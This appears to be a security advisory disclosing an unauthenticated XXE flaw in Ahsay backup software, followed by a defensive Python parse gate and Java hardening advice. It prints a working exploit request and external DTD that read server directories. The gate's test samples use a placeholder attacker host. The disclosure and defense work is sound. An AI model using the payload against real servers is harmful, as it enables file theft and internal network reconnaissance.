Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp).

Technical details

Sending the following POST request with an XXE payload makes the server raise an error whose message discloses the content of a file or a directory listing:

POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "https://www.wbsec.nl/ahsay/oob.dtd"> %remote;%intern; %trick;]>

As you can see, it includes the external DTD https://www.wbsec.nl/xxe/oob.dtd, which is hosted on my server and contains:

<!ENTITY % payl SYSTEM "file:///c:/">
<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM 'file://:%payl;/%payl;'>">

When the server processes the POST request, it fetches the DTD and tries to interpret it, but fails. The resulting error message discloses the content of the directory. Through this XXE it is possible to read files, scan internal networks and send requests to internal systems. No authentication is required to exploit it.
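The defensive counterpart, added here as an example that is not Ahsay's own code: a parse gate built on Python's stdlib expat that refuses the constructs the payload above depends on (an external DTD, parameter entities, entities with a SYSTEM or PUBLIC identifier) before any entity is resolved. The sample bodies and the http://attacker.invalid/ host are constructed placeholders.

```python
"""XXE gate for XML request bodies (added example, not Ahsay's code)."""
import xml.parsers.expat


class ExternalEntityError(ValueError):
    """Raised when a body tries to pull content from outside the document."""


def parse_without_xxe(body: bytes, allow_doctype: bool = False):
    """Parse `body` and return its root element name.

    allow_doctype=False rejects every DOCTYPE (the simplest hardening).
    allow_doctype=True keeps an internal subset with plain internal
    entities but still rejects anything external or parameter-based.
    """
    parser = xml.parsers.expat.ParserCreate()
    # Never expand parameter entities such as %remote; in the payload.
    parser.SetParamEntityParsing(
        xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype:
            raise ExternalEntityError("DOCTYPE not allowed")
        if sysid or pubid:  # <!DOCTYPE x SYSTEM "http://..."> style
            raise ExternalEntityError(f"external DTD: {sysid or pubid}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param or sysid or pubid:
            raise ExternalEntityError(f"external/parameter entity: {name}")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.Parse(body, True)  # handler exceptions propagate out of Parse
    return root[0] if root else None


def is_rejected(body: bytes, allow_doctype: bool = False) -> bool:
    """True if the gate refuses `body` (handy for logging and tests)."""
    try:
        parse_without_xxe(body, allow_doctype)
    except ExternalEntityError:
        return True
    return False


# Constructed samples: the advisory's DOCTYPE shape with a placeholder host.
XXE_BODY = (b'<?xml version="1.0"?>\n<!DOCTYPE root [<!ENTITY % remote SYSTEM '
            b'"http://attacker.invalid/oob.dtd"> %remote;]>\n<root/>')
INTERNAL_ENTITY_BODY = b'<!DOCTYPE root [<!ENTITY g "hi">]><root>&g;</root>'
BENIGN_BODY = b'<?xml version="1.0"?><root><profile name="x"/></root>'
```

On the Java stack Ahsay runs on, the equivalent is setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the DocumentBuilderFactory or SAXParserFactory before parsing request bodies.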